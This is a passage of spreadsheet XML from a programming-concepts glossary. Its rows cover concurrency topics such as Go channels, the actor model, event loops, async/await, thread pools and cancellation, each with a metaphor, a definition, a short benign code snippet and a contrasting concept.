      </c>
      <c r="E554" t="inlineStr">
        <is>
          <t>A zero-capacity channel where send and receive must meet in time: the sender blocks until a receiver takes the value — a rendezvous.</t>
        </is>
      </c>
      <c r="F554" t="inlineStr">
        <is>
          <t>ch := make(chan int) // cap 0 / ch &lt;- 1 blocks until someone does &lt;-ch</t>
        </is>
      </c>
      <c r="G554" t="inlineStr">
        <is>
          <t>Buffered channel — buffered sends succeed while capacity remains; unbuffered sends always wait for a live receiver.</t>
        </is>
      </c>
      <c r="H554" t="inlineStr">
        <is>
          <t>A baton pass that only works if both runners touch it at once.</t>
        </is>
      </c>
      <c r="J554" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K554" t="inlineStr">
        <is>
          <t>Message passing &amp; actors</t>
        </is>
      </c>
    </row>
    <row r="555">
      <c r="A555" t="n">
        <v>0</v>
      </c>
      <c r="B555" t="inlineStr">
        <is>
          <t>553</t>
        </is>
      </c>
      <c r="C555" t="inlineStr">
        <is>
          <t>Buffered channel</t>
        </is>
      </c>
      <c r="D555" t="inlineStr">
        <is>
          <t>A sushi conveyor with exactly N plate slots: the chef keeps placing plates until the belt is full, then must stand and wait.</t>
        </is>
      </c>
      <c r="E555" t="inlineStr">
        <is>
          <t>A channel with capacity N: sends complete immediately until the buffer fills, decoupling producer and consumer speeds up to N items.</t>
        </is>
      </c>
      <c r="F555" t="inlineStr">
        <is>
          <t>ch := make(chan int, 100) / queue.Queue(maxsize=100) # Python analog</t>
        </is>
      </c>
      <c r="G555" t="inlineStr">
        <is>
          <t>Unbounded queue — a buffered channel's fixed cap creates backpressure; unbounded queues hide overload until memory dies.</t>
        </is>
      </c>
      <c r="H555" t="inlineStr">
        <is>
          <t>An N-slot toast rack between toaster and breakfast table.</t>
        </is>
      </c>
      <c r="J555" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K555" t="inlineStr">
        <is>
          <t>Message passing &amp; actors</t>
        </is>
      </c>
    </row>
    <row r="556">
      <c r="A556" t="n">
        <v>0</v>
      </c>
      <c r="B556" t="inlineStr">
        <is>
          <t>554</t>
        </is>
      </c>
      <c r="C556" t="inlineStr">
        <is>
          <t>Closing channels</t>
        </is>
      </c>
      <c r="D556" t="inlineStr">
        <is>
          <t>The baker flips the sign to CLOSED: customers already in line are served the last loaves, and then the line simply ends — no one waits forever.</t>
        </is>
      </c>
      <c r="E556" t="inlineStr">
        <is>
          <t>Closing a channel broadcasts 'no more values': receivers drain what remains, and range loops over the channel then end cleanly.</t>
        </is>
      </c>
      <c r="F556" t="inlineStr">
        <is>
          <t>close(ch) // sender's job, never receiver's / for v := range ch { use(v) }</t>
        </is>
      </c>
      <c r="G556" t="inlineStr">
        <is>
          <t>Sentinel value — close broadcasts completion to all receivers at once; a sentinel item informs only the one receiver that pops it.</t>
        </is>
      </c>
      <c r="H556" t="inlineStr">
        <is>
          <t>Last-call bell that everyone in the pub hears simultaneously.</t>
        </is>
      </c>
      <c r="J556" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K556" t="inlineStr">
        <is>
          <t>Message passing &amp; actors</t>
        </is>
      </c>
    </row>
    <row r="557">
      <c r="A557" t="n">
        <v>0</v>
      </c>
      <c r="B557" t="inlineStr">
        <is>
          <t>555</t>
        </is>
      </c>
      <c r="C557" t="inlineStr">
        <is>
          <t>Select</t>
        </is>
      </c>
      <c r="D557" t="inlineStr">
        <is>
          <t>A 1950s switchboard operator watching five blinking lines, plugging into whichever rings first — flipping a coin when two ring together.</t>
        </is>
      </c>
      <c r="E557" t="inlineStr">
        <is>
          <t>Waits on multiple channel operations at once and runs whichever becomes ready first, choosing pseudo-randomly among ties.</t>
        </is>
      </c>
      <c r="F557" t="inlineStr">
        <is>
          <t>select { / case v := &lt;-jobs: work(v) / case &lt;-time.After(time.Second): timeout() / }</t>
        </is>
      </c>
      <c r="G557" t="inlineStr">
        <is>
          <t>switch statement — switch branches on a value available now; select blocks until some channel operation can proceed.</t>
        </is>
      </c>
      <c r="H557" t="inlineStr">
        <is>
          <t>A dog watching five gopher holes at once.</t>
        </is>
      </c>
      <c r="J557" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K557" t="inlineStr">
        <is>
          <t>Message passing &amp; actors</t>
        </is>
      </c>
    </row>
    <row r="558">
      <c r="A558" t="n">
        <v>0</v>
      </c>
      <c r="B558" t="inlineStr">
        <is>
          <t>556</t>
        </is>
      </c>
      <c r="C558" t="inlineStr">
        <is>
          <t>CSP</t>
        </is>
      </c>
      <c r="D558" t="inlineStr">
        <is>
          <t>Rows of sealed phone booths: each occupant computes entirely alone and may only whisper through connecting tubes, while Professor Hoare patrols the aisle.</t>
        </is>
      </c>
      <c r="E558" t="inlineStr">
        <is>
          <t>Hoare's Communicating Sequential Processes: independent sequential processes interacting only via synchronous channels — Go's ancestor.</t>
        </is>
      </c>
      <c r="F558" t="inlineStr">
        <is>
          <t>Hoare 1978, 'Communicating Sequential Processes' / Go channels = CSP made practical</t>
        </is>
      </c>
      <c r="G558" t="inlineStr">
        <is>
          <t>Actor model — CSP channels are anonymous rendezvous points; actors address each other by identity with async mailboxes.</t>
        </is>
      </c>
      <c r="H558" t="inlineStr">
        <is>
          <t>Monks under a vow of silence passing notes through wall slots.</t>
        </is>
      </c>
      <c r="J558" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K558" t="inlineStr">
        <is>
          <t>Message passing &amp; actors</t>
        </is>
      </c>
    </row>
    <row r="559">
      <c r="A559" t="n">
        <v>0</v>
      </c>
      <c r="B559" t="inlineStr">
        <is>
          <t>557</t>
        </is>
      </c>
      <c r="C559" t="inlineStr">
        <is>
          <t>Actor model</t>
        </is>
      </c>
      <c r="D559" t="inlineStr">
        <is>
          <t>Method actors in soundproof dressing rooms, each reading fan mail one letter at a time and never letting anyone else touch their props.</t>
        </is>
      </c>
      <c r="E559" t="inlineStr">
        <is>
          <t>Concurrency units with private state that react to messages one at a time: update state, send messages, spawn new actors.</t>
        </is>
      </c>
      <c r="F559" t="inlineStr">
        <is>
          <t>Erlang: Pid ! {deposit, 100} / Akka: ref.tell(msg, self)</t>
        </is>
      </c>
      <c r="G559" t="inlineStr">
        <is>
          <t>CSP — actors are named, with async unbounded mailboxes; CSP channels are anonymous and typically synchronous.</t>
        </is>
      </c>
      <c r="H559" t="inlineStr">
        <is>
          <t>Beehive of cells where each bee only answers waggle-dance messages.</t>
        </is>
      </c>
      <c r="J559" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K559" t="inlineStr">
        <is>
          <t>Message passing &amp; actors</t>
        </is>
      </c>
    </row>
    <row r="560">
      <c r="A560" t="n">
        <v>0</v>
      </c>
      <c r="B560" t="inlineStr">
        <is>
          <t>558</t>
        </is>
      </c>
      <c r="C560" t="inlineStr">
        <is>
          <t>Mailbox</t>
        </is>
      </c>
      <c r="D560" t="inlineStr">
        <is>
          <t>A single brass mail slot into the dressing room: letters pile up in arrival order, but the actor inside opens exactly one at a time.</t>
        </is>
      </c>
      <c r="E560" t="inlineStr">
        <is>
          <t>An actor's inbound message queue; draining it one message at a time makes the actor internally single-threaded — no locks needed.</t>
        </is>
      </c>
      <c r="F560" t="inlineStr">
        <is>
          <t>receive {msg, X} -&gt; handle(X) end % Erlang / queue drained strictly sequentially</t>
        </is>
      </c>
      <c r="G560" t="inlineStr">
        <is>
          <t>Channel — a mailbox belongs to exactly one receiving actor; a channel can be shared by many senders and receivers.</t>
        </is>
      </c>
      <c r="H560" t="inlineStr">
        <is>
          <t>Ticket spike on a diner counter, orders pulled off one by one.</t>
        </is>
      </c>
      <c r="J560" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K560" t="inlineStr">
        <is>
          <t>Message passing &amp; actors</t>
        </is>
      </c>
    </row>
    <row r="561">
      <c r="A561" t="n">
        <v>0</v>
      </c>
      <c r="B561" t="inlineStr">
        <is>
          <t>559</t>
        </is>
      </c>
      <c r="C561" t="inlineStr">
        <is>
          <t>Bounded channels</t>
        </is>
      </c>
      <c r="D561" t="inlineStr">
        <is>
          <t>A garden hose with your thumb over the nozzle: squeeze the outflow and the pressure travels all the way back up to slow the tap itself.</t>
        </is>
      </c>
      <c r="E561" t="inlineStr">
        <is>
          <t>Bounded buffers push slowdown upstream: when consumers lag, producers block or shed load instead of ballooning hidden queues.</t>
        </is>
      </c>
      <c r="F561" t="inlineStr">
        <is>
          <t>make(chan T, 64) // full = producer blocks / queue.put() blocks at maxsize</t>
        </is>
      </c>
      <c r="G561" t="inlineStr">
        <is>
          <t>Rate limiting — a rate limit is a fixed preset cap; backpressure adapts dynamically to the consumer's real current speed. | cf. 877 Backpressure (déjà pris): 559 is the in-process channel mechanism; 877 the end-to-end resilience pattern</t>
        </is>
      </c>
      <c r="H561" t="inlineStr">
        <is>
          <t>Highway on-ramp meter timed by downstream congestion.</t>
        </is>
      </c>
      <c r="J561" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K561" t="inlineStr">
        <is>
          <t>Message passing &amp; actors</t>
        </is>
      </c>
    </row>
    <row r="562">
      <c r="A562" t="n">
        <v>0</v>
      </c>
      <c r="B562" t="inlineStr">
        <is>
          <t>560</t>
        </is>
      </c>
      <c r="C562" t="inlineStr">
        <is>
          <t>Non-blocking I/O</t>
        </is>
      </c>
      <c r="D562" t="inlineStr">
        <is>
          <t>A restaurant buzzer puck instead of standing at the counter: you order, wander off to browse, and the puck rattles when the food is ready.</t>
        </is>
      </c>
      <c r="E562" t="inlineStr">
        <is>
          <t>I/O calls that return immediately instead of parking the thread; readiness arrives later via polling or OS notification (epoll/kqueue).</t>
        </is>
      </c>
      <c r="F562" t="inlineStr">
        <is>
          <t>sock.setblocking(False) / epoll.poll() -&gt; which fds are ready</t>
        </is>
      </c>
      <c r="G562" t="inlineStr">
        <is>
          <t>Async/await — non-blocking I/O is the OS facility; async/await is language syntax layered on top of it.</t>
        </is>
      </c>
      <c r="H562" t="inlineStr">
        <is>
          <t>Dropping film at the lab and getting a text when developed.</t>
        </is>
      </c>
      <c r="J562" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K562" t="inlineStr">
        <is>
          <t>Async/await &amp; event loops</t>
        </is>
      </c>
    </row>
    <row r="563">
      <c r="A563" t="n">
        <v>0</v>
      </c>
      <c r="B563" t="inlineStr">
        <is>
          <t>561</t>
        </is>
      </c>
      <c r="C563" t="inlineStr">
        <is>
          <t>Event loop</t>
        </is>
      </c>
      <c r="D563" t="inlineStr">
        <is>
          <t>A lone carousel operator at the hub, grabbing whichever mailbag the spinning ride swings past next, handling it fully, then reaching for the next.</t>
        </is>
      </c>
      <c r="E563" t="inlineStr">
        <is>
          <t>A single thread looping forever: wait for ready events, run each handler to completion, repeat — the engine of Node and asyncio.</t>
        </is>
      </c>
      <c r="F563" t="inlineStr">
        <is>
          <t>while True: / for ev in selector.select(): / ev.callback()</t>
        </is>
      </c>
      <c r="G563" t="inlineStr">
        <is>
          <t>Thread pool — the loop multiplexes many tasks on ONE thread; a pool spreads tasks across MANY threads.</t>
        </is>
      </c>
      <c r="H563" t="inlineStr">
        <is>
          <t>Lighthouse keeper answering signals one sweep at a time.</t>
        </is>
      </c>
      <c r="J563" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K563" t="inlineStr">
        <is>
          <t>Async/await &amp; event loops</t>
        </is>
      </c>
    </row>
    <row r="564">
      <c r="A564" t="n">
        <v>0</v>
      </c>
      <c r="B564" t="inlineStr">
        <is>
          <t>562</t>
        </is>
      </c>
      <c r="C564" t="inlineStr">
        <is>
          <t>Microtask vs macrotask</t>
        </is>
      </c>
      <c r="D564" t="inlineStr">
        <is>
          <t>Between every train that pulls into the station (macrotask), the janitor must sweep up every last confetti scrap on the platform (microtasks) before the next train may enter.</t>
        </is>
      </c>
      <c r="E564" t="inlineStr">
        <is>
          <t>The event loop drains the ENTIRE microtask queue (promise callbacks) after each macrotask (timer, I/O) - so promises always run before the next setTimeout.</t>
        </is>
      </c>
      <c r="F564" t="inlineStr">
        <is>
          <t>setTimeout(() =&gt; log('macro')); Promise.resolve().then(() =&gt; log('micro'))  // micro first</t>
        </is>
      </c>
      <c r="G564" t="inlineStr">
        <is>
          <t>vs the event loop itself (561): the loop is the engine; micro/macro is the two-tier priority of its queues</t>
        </is>
      </c>
      <c r="H564" t="inlineStr">
        <is>
          <t>VIP line emptied fully before the regular queue advances</t>
        </is>
      </c>
      <c r="J564" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K564" t="inlineStr">
        <is>
          <t>Async/await &amp; event loops</t>
        </is>
      </c>
    </row>
    <row r="565">
      <c r="A565" t="n">
        <v>0</v>
      </c>
      <c r="B565" t="inlineStr">
        <is>
          <t>563</t>
        </is>
      </c>
      <c r="C565" t="inlineStr">
        <is>
          <t>Callback hell</t>
        </is>
      </c>
      <c r="D565" t="inlineStr">
        <is>
          <t>Russian dolls of mechanic napkins: inside each callback's napkin is another napkin with another number, six garages deep, indenting toward the horizon.</t>
        </is>
      </c>
      <c r="E565" t="inlineStr">
        <is>
          <t>Sequential async logic written as nested callbacks marches code off the right margin and scatters error handling — the pyramid of doom.</t>
        </is>
      </c>
      <c r="F565" t="inlineStr">
        <is>
          <t>getUser(id, u =&gt; / getOrders(u, os =&gt; / getItems(os[0], is =&gt; ...)))</t>
        </is>
      </c>
      <c r="G565" t="inlineStr">
        <is>
          <t>Deep recursion — recursion nests live stack frames now; callback hell nests source code that fires across future ticks.</t>
        </is>
      </c>
      <c r="H565" t="inlineStr">
        <is>
          <t>Staircase of ever-smaller doors, each hiding the next errand.</t>
        </is>
      </c>
      <c r="J565" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K565" t="inlineStr">
        <is>
          <t>Async/await &amp; event loops</t>
        </is>
      </c>
    </row>
    <row r="566">
      <c r="A566" t="n">
        <v>0</v>
      </c>
      <c r="B566" t="inlineStr">
        <is>
          <t>564</t>
        </is>
      </c>
      <c r="C566" t="inlineStr">
        <is>
          <t>Promise / future</t>
        </is>
      </c>
      <c r="D566" t="inlineStr">
        <is>
          <t>A dry-cleaning ticket: not the shirt, but a tradable claim on the future shirt — you can even hand the ticket to somebody else.</t>
        </is>
      </c>
      <c r="E566" t="inlineStr">
        <is>
          <t>A first-class placeholder for a result not ready yet; consumers attach continuations or await its resolution or failure.</t>
        </is>
      </c>
      <c r="F566" t="inlineStr">
        <is>
          <t>p = fetch(url) / p.then(r =&gt; r.json()).catch(log)</t>
        </is>
      </c>
      <c r="G566" t="inlineStr">
        <is>
          <t>Callback — a promise reifies the pending result as a composable value instead of burying it in a function argument.</t>
        </is>
      </c>
      <c r="H566" t="inlineStr">
        <is>
          <t>IOU note that pays out or bounces exactly once.</t>
        </is>
      </c>
      <c r="J566" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K566" t="inlineStr">
        <is>
          <t>Async/await &amp; event loops</t>
        </is>
      </c>
    </row>
    <row r="567">
      <c r="A567" t="n">
        <v>0</v>
      </c>
      <c r="B567" t="inlineStr">
        <is>
          <t>565</t>
        </is>
      </c>
      <c r="C567" t="inlineStr">
        <is>
          <t>Async/await</t>
        </is>
      </c>
      <c r="D567" t="inlineStr">
        <is>
          <t>A bookmark dropped mid-sentence when the doorbell rings: the reader handles the door, returns, and resumes on the exact same syllable.</t>
        </is>
      </c>
      <c r="E567" t="inlineStr">
        <is>
          <t>Syntax that suspends a coroutine at await and resumes it when the awaited future resolves — async code shaped like sync code.</t>
        </is>
      </c>
      <c r="F567" t="inlineStr">
        <is>
          <t>async def main(): / r = await fetch(url) / print(r.status)</t>
        </is>
      </c>
      <c r="G567" t="inlineStr">
        <is>
          <t>Threads — await switches only at marked points on one thread; threads can be preempted between any two instructions.</t>
        </is>
      </c>
      <c r="H567" t="inlineStr">
        <is>
          <t>Pause button that later resumes the movie frame-perfect.</t>
        </is>
      </c>
      <c r="J567" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K567" t="inlineStr">
        <is>
          <t>Async/await &amp; event loops</t>
        </is>
      </c>
    </row>
    <row r="568">
      <c r="A568" t="n">
        <v>0</v>
      </c>
      <c r="B568" t="inlineStr">
        <is>
          <t>566</t>
        </is>
      </c>
      <c r="C568" t="inlineStr">
        <is>
          <t>Coroutine</t>
        </is>
      </c>
      <c r="D568" t="inlineStr">
        <is>
          <t>A campfire storyteller who freezes mid-word, hands the talking stick along the circle, and later thaws on precisely the same syllable.</t>
        </is>
      </c>
      <c r="E568" t="inlineStr">
        <is>
          <t>A function that can suspend itself mid-execution, yield control, and later resume with all its local state intact.</t>
        </is>
      </c>
      <c r="F568" t="inlineStr">
        <is>
          <t>async def f(): await g() # native coroutine / def gen(): x = yield # generator form</t>
        </is>
      </c>
      <c r="G568" t="inlineStr">
        <is>
          <t>Thread — a coroutine suspends voluntarily and costs a small frame; a thread is preempted by the OS and costs a full stack.</t>
        </is>
      </c>
      <c r="H568" t="inlineStr">
        <is>
          <t>Knitting set down mid-row with the needle marking the stitch.</t>
        </is>
      </c>
      <c r="J568" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K568" t="inlineStr">
        <is>
          <t>Async/await &amp; event loops</t>
        </is>
      </c>
    </row>
    <row r="569">
      <c r="A569" t="n">
        <v>0</v>
      </c>
      <c r="B569" t="inlineStr">
        <is>
          <t>567</t>
        </is>
      </c>
      <c r="C569" t="inlineStr">
        <is>
          <t>Await as yield point</t>
        </is>
      </c>
      <c r="D569" t="inlineStr">
        <is>
          <t>Musical statues: other dancers may only move (interleave) during the pauses in the music at 'await' — between pauses, the whole room is frozen for you.</t>
        </is>
      </c>
      <c r="E569" t="inlineStr">
        <is>
          <t>In cooperative async, code between awaits runs atomically on the loop; interleaving can happen only at await boundaries.</t>
        </is>
      </c>
      <c r="F569" t="inlineStr">
        <is>
          <t>self.n += 1 # safe: no await inside / await io() # others may run HERE</t>
        </is>
      </c>
      <c r="G569" t="inlineStr">
        <is>
          <t>Thread safety — single-threaded async still races across awaits; a check-then-act spanning an await is a real bug.</t>
        </is>
      </c>
      <c r="H569" t="inlineStr">
        <is>
          <t>Board game where opponents move only when you end your turn.</t>
        </is>
      </c>
      <c r="J569" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K569" t="inlineStr">
        <is>
          <t>Async/await &amp; event loops</t>
        </is>
      </c>
    </row>
    <row r="570">
      <c r="A570" t="n">
        <v>0</v>
      </c>
      <c r="B570" t="inlineStr">
        <is>
          <t>568</t>
        </is>
      </c>
      <c r="C570" t="inlineStr">
        <is>
          <t>Never block the loop</t>
        </is>
      </c>
      <c r="D570" t="inlineStr">
        <is>
          <t>The carousel operator stops to eat an entire steak; every mailbag on the ride circles past unserved — the whole fair queues behind his lunch.</t>
        </is>
      </c>
      <c r="E570" t="inlineStr">
        <is>
          <t>One blocking call or long computation on the event-loop thread freezes every task; offload such work to executors or workers.</t>
        </is>
      </c>
      <c r="F570" t="inlineStr">
        <is>
          <t>time.sleep(5) # freezes ALL tasks / await loop.run_in_executor(None, cpu_work)</t>
        </is>
      </c>
      <c r="G570" t="inlineStr">
        <is>
          <t>Blocking a worker thread — a stalled pool thread delays one task; a stalled loop stalls every task in the process.</t>
        </is>
      </c>
      <c r="H570" t="inlineStr">
        <is>
          <t>Cashier balancing the till while the queue snakes out the door.</t>
        </is>
      </c>
      <c r="J570" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K570" t="inlineStr">
        <is>
          <t>Async/await &amp; event loops</t>
        </is>
      </c>
    </row>
    <row r="571">
      <c r="A571" t="n">
        <v>0</v>
      </c>
      <c r="B571" t="inlineStr">
        <is>
          <t>569</t>
        </is>
      </c>
      <c r="C571" t="inlineStr">
        <is>
          <t>Function colors</t>
        </is>
      </c>
      <c r="D571" t="inlineStr">
        <is>
          <t>Shaking hands with a red-painted (async) function stains your hand red too — soon every caller up the chain is wearing red gloves.</t>
        </is>
      </c>
      <c r="E571" t="inlineStr">
        <is>
          <t>Async and sync functions form two 'colors': plain callers can't await async ones, so asyncness spreads virally up the call chain.</t>
        </is>
      </c>
      <c r="F571" t="inlineStr">
        <is>
          <t>def f(): await g() # SyntaxError / async def f(): return await g() # f is red now</t>
        </is>
      </c>
      <c r="G571" t="inlineStr">
        <is>
          <t>Blocking vs non-blocking — colors are a static split baked into signatures; blocking is a runtime behavior.</t>
        </is>
      </c>
      <c r="H571" t="inlineStr">
        <is>
          <t>One drop of dye tinting every bucket poured upstream of it.</t>
        </is>
      </c>
      <c r="J571" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K571" t="inlineStr">
        <is>
          <t>Async/await &amp; event loops</t>
        </is>
      </c>
    </row>
    <row r="572">
      <c r="A572" t="n">
        <v>0</v>
      </c>
      <c r="B572" t="inlineStr">
        <is>
          <t>570</t>
        </is>
      </c>
      <c r="C572" t="inlineStr">
        <is>
          <t>Thread pool</t>
        </is>
      </c>
      <c r="D572" t="inlineStr">
        <is>
          <t>A hotel keeps exactly five lifeguards rotating at the pool: swimmers (tasks) queue for attention; nobody hires a fresh lifeguard per swimmer.</t>
        </is>
      </c>
      <c r="E572" t="inlineStr">
        <is>
          <t>A fixed crew of reusable worker threads pulling tasks from a queue — amortizes thread creation and caps total concurrency.</t>
        </is>
      </c>
      <c r="F572" t="inlineStr">
        <is>
          <t>ex = ThreadPoolExecutor(max_workers=8) / ex.submit(task, arg)</t>
        </is>
      </c>
      <c r="G572" t="inlineStr">
        <is>
          <t>Thread-per-task — spawning per task can explode into thousands of threads; a pool bounds and recycles them.</t>
        </is>
      </c>
      <c r="H572" t="inlineStr">
        <is>
          <t>Taxi rank with a fixed fleet instead of building a car per fare.</t>
        </is>
      </c>
      <c r="J572" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K572" t="inlineStr">
        <is>
          <t>Executors, pools &amp; structured concurrency</t>
        </is>
      </c>
    </row>
    <row r="573">
      <c r="A573" t="n">
        <v>0</v>
      </c>
      <c r="B573" t="inlineStr">
        <is>
          <t>571</t>
        </is>
      </c>
      <c r="C573" t="inlineStr">
        <is>
          <t>Executor &amp; futures</t>
        </is>
      </c>
      <c r="D573" t="inlineStr">
        <is>
          <t>A concierge desk: hand over any errand, instantly get a numbered claim ticket; which bellhop actually runs it is not your problem.</t>
        </is>
      </c>
      <c r="E573" t="inlineStr">
        <is>
          <t>Submit a callable to an executor and immediately receive a future — the handle to the eventual result — decoupling what from where and when.</t>
        </is>
      </c>
      <c r="F573" t="inlineStr">
        <is>
          <t>f = ex.submit(fetch, url) / print(f.result(timeout=5))</t>
        </is>
      </c>
      <c r="G573" t="inlineStr">
        <is>
          <t>Thread pool — the pool is the workers; the executor is the submission interface that hands back futures.</t>
        </is>
      </c>
      <c r="H573" t="inlineStr">
        <is>
          <t>Restaurant order number stand you carry to your table.</t>
        </is>
      </c>
      <c r="J573" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K573" t="inlineStr">
        <is>
          <t>Executors, pools &amp; structured concurrency</t>
        </is>
      </c>
    </row>
    <row r="574">
      <c r="A574" t="n">
        <v>0</v>
      </c>
      <c r="B574" t="inlineStr">
        <is>
          <t>572</t>
        </is>
      </c>
      <c r="C574" t="inlineStr">
        <is>
          <t>Pool sizing</t>
        </is>
      </c>
      <c r="D574" t="inlineStr">
        <is>
          <t>Chessmasters versus pizza couriers: hire one grandmaster per board (CPU), but dozens of couriers per oven, because couriers mostly sit in traffic (wait).</t>
        </is>
      </c>
      <c r="E574" t="inlineStr">
        <is>
          <t>CPU-bound: about one thread per core; I/O-bound: roughly cores x (1 + wait/compute), since waiting threads use no CPU.</t>
        </is>
      </c>
      <c r="F574" t="inlineStr">
        <is>
          <t>cpu: max_workers = os.cpu_count() / io: workers ~ cores * (1 + wait/service)</t>
        </is>
      </c>
      <c r="G574" t="inlineStr">
        <is>
          <t>More threads = faster — beyond the right size, extra threads add only context-switch and memory cost.</t>
        </is>
      </c>
      <c r="H574" t="inlineStr">
        <is>
          <t>One oven per baker, but many delivery bikes per oven.</t>
        </is>
      </c>
      <c r="J574" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K574" t="inlineStr">
        <is>
          <t>Executors, pools &amp; structured concurrency</t>
        </is>
      </c>
    </row>
    <row r="575">
      <c r="A575" t="n">
        <v>0</v>
      </c>
      <c r="B575" t="inlineStr">
        <is>
          <t>573</t>
        </is>
      </c>
      <c r="C575" t="inlineStr">
        <is>
          <t>Bounded queue &amp; saturation</t>
        </is>
      </c>
      <c r="D575" t="inlineStr">
        <is>
          <t>A coat check with exactly 50 brass hooks: coat 51 gets a polite 'we're full' at the door — far better than coats silently piling to the ceiling in back.</t>
        </is>
      </c>
      <c r="E575" t="inlineStr">
        <is>
          <t>Give the pool a bounded task queue plus a rejection policy; unbounded queues convert overload into hidden latency and eventual OOM.</t>
        </is>
      </c>
      <c r="F575" t="inlineStr">
        <is>
          <t>ThreadPoolExecutor(.., ArrayBlockingQueue(100), / CallerRunsPolicy()) // Java</t>
        </is>
      </c>
      <c r="G575" t="inlineStr">
        <is>
          <t>Backpressure — the same principle; a saturation policy is the pool-specific mechanism (reject, block, or caller-runs).</t>
        </is>
      </c>
      <c r="H575" t="inlineStr">
        <is>
          <t>Nightclub capacity sign enforced at the door, not inside.</t>
        </is>
      </c>
      <c r="J575" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K575" t="inlineStr">
        <is>
          <t>Executors, pools &amp; structured concurrency</t>
        </is>
      </c>
    </row>
    <row r="576">
      <c r="A576" t="n">
        <v>0</v>
      </c>
      <c r="B576" t="inlineStr">
        <is>
          <t>574</t>
        </is>
      </c>
      <c r="C576" t="inlineStr">
        <is>
          <t>Work stealing</t>
        </is>
      </c>
      <c r="D576" t="inlineStr">
        <is>
          <t>Pickpocket chefs: a cook who finishes early tiptoes over and lifts order slips off the BOTTOM of a swamped colleague's ticket spike.</t>
        </is>
      </c>
      <c r="E576" t="inlineStr">
        <is>
          <t>Idle workers steal tasks from the tail of busy workers' local deques, auto-balancing load with minimal contention.</t>
        </is>
      </c>
      <c r="F576" t="inlineStr">
        <is>
          <t>ForkJoinPool, Go scheduler, Tokio / steal from tail; owner pops from head</t>
        </is>
      </c>
      <c r="G576" t="inlineStr">
        <is>
          <t>Single shared queue — one global queue contends on every pop; stealing keeps the hot path local and nearly lock-free.</t>
        </is>
      </c>
      <c r="H576" t="inlineStr">
        <is>
          <t>Supermarket baggers drifting to whichever lane backs up.</t>
        </is>
      </c>
      <c r="J576" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K576" t="inlineStr">
        <is>
          <t>Executors, pools &amp; structured concurrency</t>
        </is>
      </c>
    </row>
    <row r="577">
      <c r="A577" t="n">
        <v>0</v>
      </c>
      <c r="B577" t="inlineStr">
        <is>
          <t>575</t>
        </is>
      </c>
      <c r="C577" t="inlineStr">
        <is>
          <t>Future composition</t>
        </is>
      </c>
      <c r="D577" t="inlineStr">
        <is>
          <t>Dry-cleaning tickets that snap together like Lego: chain them end-to-end (then), or clip five into one frame that completes only when all five shirts return (gather).</t>
        </is>
      </c>
      <c r="E577" t="inlineStr">
        <is>
          <t>Chain and combine futures — then/map, all/gather, any/race — building async dataflow without blocking to glue the steps.</t>
        </is>
      </c>
      <c r="F577" t="inlineStr">
        <is>
          <t>results = await asyncio.gather(f1(), f2()) / cf.thenApply(x -&gt; x * 2) // Java</t>
        </is>
      </c>
      <c r="G577" t="inlineStr">
        <is>
          <t>Sequential .result() calls — blocking on each future serializes the waits; composition schedules continuations to overlap them.</t>
        </is>
      </c>
      <c r="H577" t="inlineStr">
        <is>
          <t>Relay of IOUs endorsed forward to the next payee.</t>
        </is>
      </c>
      <c r="J577" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K577" t="inlineStr">
        <is>
          <t>Executors, pools &amp; structured concurrency</t>
        </is>
      </c>
    </row>
    <row r="578">
      <c r="A578" t="n">
        <v>0</v>
      </c>
      <c r="B578" t="inlineStr">
        <is>
          <t>576</t>
        </is>
      </c>
      <c r="C578" t="inlineStr">
        <is>
          <t>Cancellation</t>
        </is>
      </c>
      <c r="D578" t="inlineStr">
        <is>
          <t>You cannot yank a surgeon out mid-operation; you slide a note under the door and she exits at the next safe suture point, instruments counted.</t>
        </is>
      </c>
      <c r="E578" t="inlineStr">
        <is>
          <t>Cancellation is cooperative: set a flag or inject an exception, and the task must notice at checkpoints and clean up — no safe hard kill.</t>
        </is>
      </c>
      <c r="F578" t="inlineStr">
        <is>
          <t>task.cancel() # CancelledError at next await / while not stop_event.is_set(): step()</t>
        </is>
      </c>
      <c r="G578" t="inlineStr">
        <is>
          <t>Thread.kill — a hard kill skips finally blocks and corrupts shared state; cooperative cancel lets the task unwind properly.</t>
        </is>
      </c>
      <c r="H578" t="inlineStr">
        <is>
